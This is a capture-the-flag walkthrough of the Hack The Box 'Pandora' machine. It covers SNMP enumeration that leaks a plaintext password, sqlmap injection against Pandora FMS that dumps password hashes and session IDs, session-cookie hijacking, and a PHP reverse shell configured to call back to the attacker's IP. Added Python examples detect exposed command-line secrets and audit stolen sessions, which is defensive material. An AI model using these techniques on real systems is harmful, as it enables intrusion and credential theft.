/etc/hosts

```
10.10.11.136 pandora.htb
```
nmap

```
nmap -sV -p- 10.10.11.136
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
wfuzz

```
wfuzz --sc 200 -w Documents/wordlist/directory-list-2.3-medium.txt http://pandora.htb/FUZZ
```

Nothing, same for the subdomains.
nmap n°2

```
sudo nmap -sU --min-rate 100 pandora.htb
PORT      STATE  SERVICE
161/udp   open   snmp
19283/udp closed keysrvr
```

Let's see what we can do with SNMP.
Metasploit

```
msfconsole
use auxiliary/scanner/snmp/snmp_enum
show options
set rhost 10.10.11.136
```

This is so cool, I can see every process, and there are lots of hackers in the box.

```
/usr/bin/host_check -u daniel -p HotelBabylon23
```
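Added example, not part of the write-up: a check for exactly the kind of leak the SNMP process list just exposed, a secret passed as a command-line argument, which every local user can read from /proc and, with a readable SNMP community, anyone on the network can read remotely. The sample process list is constructed; only the host_check and polkitd lines come from the box.

```python
import shlex
from typing import Dict, List, Optional

# Constructed sample: process command lines as an SNMP hrSWRunParameters walk
# (or `ps -eo args`) returns them. The host_check and polkitd lines are the ones
# the write-up found on the box; the other lines are made up for this example.
SAMPLE_PROCESSES = [
    "/usr/lib/policykit-1/polkitd --no-debug",
    "/usr/bin/host_check -u daniel -p HotelBabylon23",
    "mysql -u root -p",                     # bare -p only prompts: not a leak
    "python3 backup.py --password=example-not-real --dest /srv/backup",
    "/usr/sbin/sshd -D",
]

# Options that take a secret as the next argument, and keys that carry one in
# key=value form. `-p` is ambiguous (a port for some tools), so review hits by hand.
SECRET_OPTS = {"-p", "--password", "--pass", "--passwd", "--secret", "--token"}
SECRET_KEYS = {"password", "pass", "passwd", "pwd", "secret", "token", "api_key", "apikey"}

def find_exposed_secret(cmdline: str) -> Optional[Dict[str, str]]:
    """Return {program, option, secret} when the command line carries a
    secret-looking argument, else None. Input is ps-style text, so shlex
    splitting is appropriate (unbalanced quotes raise ValueError)."""
    argv = shlex.split(cmdline)
    for i, tok in enumerate(argv):
        if "=" in tok:                                           # --password=value
            key, value = tok.split("=", 1)
            if key.lstrip("-").lower() in SECRET_KEYS and value:
                return {"program": argv[0], "option": key, "secret": value}
        elif tok in SECRET_OPTS and i + 1 < len(argv) and not argv[i + 1].startswith("-"):
            return {"program": argv[0], "option": tok, "secret": argv[i + 1]}  # -p value
    return None

def audit(cmdlines: List[str]) -> List[Dict[str, str]]:
    """All findings over a process list, in list order."""
    return [f for f in map(find_exposed_secret, cmdlines) if f]

def redact(cmdline: str) -> str:
    """The same command line with the secret masked, safe to paste into an alert."""
    f = find_exposed_secret(cmdline)
    if f is None:
        return cmdline
    out = []
    for tok in shlex.split(cmdline):
        if tok == f["secret"]:
            out.append("[REDACTED]")
        elif tok.startswith(f["option"] + "="):
            out.append(f["option"] + "=[REDACTED]")
        else:
            out.append(tok)
    return " ".join(out)
```

The fix on the host side is to move the credential out of argv (a 0600 config file, an environment variable read by the program, or a prompt) and to restrict who can read the SNMP community that exposes the process table.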
ssh
lse
On my computer, in my script directory:

```
python2.7 -m SimpleHTTPServer
```

On the target:

```
wget http://10.10.15.22:8000/lse.sh
chmod +x lse.sh
./lse.sh
```

```
============================================================( file system )=====
[*] fst000 Writable files outside user's home.............................. yes!
[*] fst010 Binaries with setuid bit........................................ yes!
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/bin/pandora_backup
---
```
PwnKit

```
root 960 0.0 0.2 236420 8932 ? Ssl 10:00 0:00 /usr/lib/policykit-1/polkitd --no-debug
```
I have to resist!!!
pandora_backup
I have to pwn matt first.
linPEAS https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
I'm not supposed to use this exploit… I could do it to get both flags, but I'm not a cheater.
I have other open ports.
Interesting files
MySQL user:

mysql

```
nmap -sV -p- 127.0.0.1
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
3306/tcp open  mysql   MySQL 5.5.5-10.3.32-MariaDB-0ubuntu0.20.04.1
```

I don't have the creds.
web

I wanted to browse pandora.pandora.htb:

It's in my /etc/hosts but it's not working, so I tried to do it via ssh with curl.

Same problem, let's look at its /etc/hosts:

```
daniel@pandora:/tmp/dir$ cat /etc/hosts
127.0.0.1 localhost.localdomain pandora.htb pandora.pandora.htb
127.0.1.1 pandora
```

127.0.0.1 pandora is the website I saw on port 80; I think 127.0.0.1 works only on localhost.

```
daniel@pandora:/tmp/dir$ curl pandora.pandora.htb
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">
```

Yesss!!!! Now I have to find a way to see it in my browser.
Web tunneling

https://www.it-connect.fr/chapitres/tunneling-ssh/ It's French but it's good!
Boom!
Where is the password… what is the username… (╯°□°)╯︵ ┻━┻
Oh no I have to be fast.
Connect with daniel

I was trying to connect with daniel. I have this error:
It’s good, I have to use the API.
Browsing the files

In /var/www/pandora/pandora_console:

```
cat pandoradb.sql | grep pass
```

```
`plugin_pass` text,
`password` varchar(45) default '',
`password` text,
`snmp_auth_pass` varchar(255) NOT NULL default '',
`snmp_privacy_pass` varchar(255) NOT NULL default '',
`plugin_pass` text,
`password` varchar(45) default NULL,
`force_change_pass` tinyint(1) unsigned NOT NULL default 0,
`last_pass_change` DATETIME NOT NULL DEFAULT 0,
`ehorus_user_level_pass` VARCHAR(45),
CREATE TABLE IF NOT EXISTS `treset_pass_history` (
`pass_opt` varchar(50) default '',
`pass` varchar(100) NOT NULL default '',
`is_password_type` tinyint(1) NOT NULL default 0,
CREATE TABLE IF NOT EXISTS `tpassword_history` (
`id_pass` int(10) unsigned NOT NULL auto_increment,
`password` varchar(45) default NULL,
PRIMARY KEY (`id_pass`)
`plugin_pass` text default '',
`password` varchar(100) default '',
`password` varchar(100) default '',
`dbpass` text,
`meta_dbpass` text,
`api_password` text NOT NULL,
CREATE TABLE IF NOT EXISTS `treset_pass` (
```

```
FROM mysql:5.5
MAINTAINER Pandora FMS Team <[email protected]>
WORKDIR /pandorafms/pandora_console
ADD pandoradb.sql /docker-entrypoint-initdb.d
ADD pandoradb_data.sql /docker-entrypoint-initdb.d
RUN chown mysql /docker-entrypoint-initdb.d
ENV MYSQL_DATABASE=pandora
RUN echo " \n\
sed -i \"1iUSE \$MYSQL_DATABASE\" /docker-entrypoint-initdb.d/pandoradb.sql \n\
sed -i \"1iUSE \$MYSQL_DATABASE\" /docker-entrypoint-initdb.d/pandoradb_data.sql \n\
" >> /docker-entrypoint-initdb.d/create_pandoradb.sh
```
Dbname="pandora", Table="tpassword_history". This website shows where we can exploit: https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained

sqlmap

I don't use sqlmap very often, that's why I had a lot of trouble.
```
sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php" -D pandora
[20:44:13] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1'). You are advised to rerun with '--crawl=2'
```

```
sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?id=''" -D pandora --tables
[20:45:33] [WARNING] GET parameter 'id' does not seem to be injectable
```

Now I have to find out what I have to use instead of 'id'.

```
sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?session_id=''" -D pandora
[20:47:42] [WARNING] potential permission problems detected ('Access denied')
```

I have another error, that's good. This is a cheat sheet: https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet

```
sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tpassword_history --dump
+---------+---------+---------------------+----------------------------------+---------------------+
| id_pass | id_user | date_end            | password                         | date_begin          |
+---------+---------+---------------------+----------------------------------+---------------------+
| 1       | matt    | 0000-00-00 00:00:00 | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 |
| 2       | daniel  | 0000-00-00 00:00:00 | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 |
+---------+---------+---------------------+----------------------------------+---------------------+
```
List of tables

```
sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?session_id=''" -D pandora --tables
[178 tables]
```
```
sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tsessions_php --dump
+----------------------------+------------------------------------------------------+-------------+
| id_session                 | data                                                 | last_active |
+----------------------------+------------------------------------------------------+-------------+
| 07ou61d2jsi3087a9jg12s3m1k | NULL                                                 | 1644502695  |
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel";                             | 1638783555  |
| 0ahul7feb1l9db7ffp8d25sjba | NULL                                                 | 1638789018  |
| 1t2n71opaqeoausmhaqk277c21 | id_usuario|s:6:"daniel";                             | 1644502477  |
| 1um23if7s531kqf5da14kf5lvm | NULL                                                 | 1638792211  |
| 2e25c62vc3odbppmg6pjbf9bum | NULL                                                 | 1638786129  |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel";                             | 1638540332  |
| 3fq6hl9r8kbadgq6r5bfjmojm5 | NULL                                                 | 1644502325  |
| 3me2jjab4atfa5f8106iklh4fc | NULL                                                 | 1638795380  |
| 4f51mju7kcuonuqor3876n8o02 | NULL                                                 | 1638786842  |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel";                             | 1638535373  |
| 59qae699l0971h13qmbpqahlls | NULL                                                 | 1638787305  |
| 5fihkihbip2jioll1a8mcsmp6j | NULL                                                 | 1638792685  |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel";                             | 1638281946  |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel";                             | 1641195617  |
| 81f3uet7p3esgiq02d4cjj48rc | NULL                                                 | 1623957150  |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel";                             | 1638446321  |
| 8uiokruc91od5tphgekpsau4lp | alert_msg|a:0:{}new_chat|b:0;                        | 1644502812  |
| 8upeameujo9nhki3ps0fu32cgd | NULL                                                 | 1638787267  |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel";                             | 1638881787  |
| a3a49kc938u7od6e6mlip1ej80 | NULL                                                 | 1638795315  |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel";                             | 1638881664  |
| cojb6rgubs18ipb35b3f6hf0vp | NULL                                                 | 1638787213  |
| d0carbrks2lvmb90ergj7jv6po | NULL                                                 | 1638786277  |
| d0h8gpqrh99ur3pfcb53vqak5e | NULL                                                 | 1644513572  |
| elks2rkjdnk8f001jqbkinael0 | NULL                                                 | 1644513405  |
| eqsc2gjr37g0ug1q4qdk3rabh4 | id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0; | 1644502437  |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel";                             | 1641200284  |
| fikt9p6i78no7aofn74rr71m85 | NULL                                                 | 1638786504  |
| fqd96rcv4ecuqs409n5qsleufi | NULL                                                 | 1638786762  |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel";                             | 1638783230  |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0;  | 1644512890  |
| gf40pukfdinc63nm5lkroidde6 | NULL                                                 | 1638786349  |
| h1ge39342hcid93s3ghk0nhl3c | NULL                                                 | 1644502501  |
| heasjj8c48ikjlvsf1uhonfesv | NULL                                                 | 1638540345  |
| hif1pavjlks18e7oqgu8bmvhis | NULL                                                 | 1644513371  |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel";                             | 1638168492  |
| j85l7a3q010b3ul6sv2eh6amo6 | NULL                                                 | 1644502455  |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel";                             | 1638456173  |
| kp90bu1mlclbaenaljem590ik3 | NULL                                                 | 1638787808  |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL                                                 | 1638796348  |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel";                             | 1638540482  |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel";                             | 1637667827  |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel";                             | 1638168416  |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL                                                 | 1638787723  |
| r097jr6k9s7k166vkvaj17na1u | NULL                                                 | 1638787677  |
| rgku3s5dj4mbr85tiefv53tdoa | id_usuario|s:6:"daniel";                             | 1638889082  |
| u5ktk2bt6ghb7s51lka5qou4r4 | id_usuario|s:6:"daniel";                             | 1638547193  |
| u74bvn6gop4rl21ds325q80j0e | id_usuario|s:6:"daniel";                             | 1638793297  |
| vntmpokca9aee53q48op3mesqs | id_usuario|s:6:"daniel";                             | 1644502107  |
+----------------------------+------------------------------------------------------+-------------+
```

```
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; |
```

You have to paste it in the cookie.

Refresh the page... and now you are matt. You can also take the admin cookie, but someone else is playing with it, so it's not working.
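As an added example (not from the write-up), a parser for the `name|value` format that PHP's default session serializer writes into the tsessions_php data column, plus the review a defender would run over that table: which rows carry an `id_usuario` and therefore log their holder straight in, and so must be invalidated (and the table's readability fixed) after an incident like this one. The rows are a constructed subset of the dump above.

```python
from typing import Any, Dict, List, Tuple

def _parse_value(data: str, pos: int) -> Tuple[Any, int]:
    """Parse one PHP-serialized value at pos; return (value, offset after it)."""
    kind = data[pos]
    if kind == "N":                                   # N;
        return None, pos + 2
    if kind in "ibd":                                 # i:5;  b:0;  d:1.5;
        end = data.index(";", pos)
        raw = data[pos + 2:end]
        return {"i": int, "d": float, "b": lambda x: x == "1"}[kind](raw), end + 1
    if kind == "s":                                   # s:6:"daniel";  (byte length, ASCII assumed)
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                             # skip :"
        return data[start:start + length], start + length + 2   # skip ";
    if kind == "a":                                   # a:N:{key;value ...}
        colon = data.index(":", pos + 2)
        count, p, arr = int(data[pos + 2:colon]), colon + 2, {}
        for _ in range(count):
            key, p = _parse_value(data, p)
            arr[key], p = _parse_value(data, p)
        return arr, p + 1                             # skip }
    raise ValueError(f"unsupported PHP type {kind!r} at offset {pos}")

def parse_php_session(data: str) -> Dict[str, Any]:
    """Decode the name|value records written by PHP's default session serializer."""
    out, pos = {}, 0
    while pos < len(data):
        bar = data.index("|", pos)
        name = data[pos:bar]
        out[name], pos = _parse_value(data, bar + 1)
    return out

# Constructed subset of the tsessions_php rows shown above: (id_session, data).
# NULL data means the session never stored anything.
SAMPLE_ROWS = [
    ("07ou61d2jsi3087a9jg12s3m1k", None),
    ("09vao3q1dikuoi1vhcvhcjjbc6", 'id_usuario|s:6:"daniel";'),
    ("8uiokruc91od5tphgekpsau4lp", "alert_msg|a:0:{}new_chat|b:0;"),
    ("eqsc2gjr37g0ug1q4qdk3rabh4", 'id_usuario|s:5:"admin";alert_msg|a:0:{}new_chat|b:0;'),
    ("g4e01qdgk36mfdh90hvcc54umq", 'id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0;'),
]

def authenticated_sessions(rows) -> Dict[str, List[str]]:
    """user -> session ids whose data carries id_usuario. Rows without it are
    anonymous and skipped; this is the list a defender invalidates after a leak."""
    result: Dict[str, List[str]] = {}
    for sid, data in rows:
        user = parse_php_session(data).get("id_usuario") if data else None
        if user:
            result.setdefault(user, []).append(sid)
    return result
```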
I have to kill them.
Oh, sorry ppl, it's not working. Hummm, it's working because I was logged in as admin, but I removed the cookie. One of them is logged in as admin; he has to finish the box first, I think. Someone is using chisel, I have to try this tool too. I think it's like my ssh tunnel.

https://github.com/jpillora/chisel Ok, I will try later.

As admin

Now I'm admin on the machine, I had to wait 2 hours.

Download the reverse shell

I've downloaded a reverse shell here: https://github.com/pentestmonkey/php-reverse-shell
```
$ip = '10.10.15.27';  // CHANGE THIS
$port = 4648;         // CHANGE THIS
```

Zip it

```
zip -r php-reverse-shell.zip php-reverse-shell.php
```
netcat
Upload it
I’m matt
pandora_backup

I can't be admin on the webpage, it's buggy. I leave this CTF.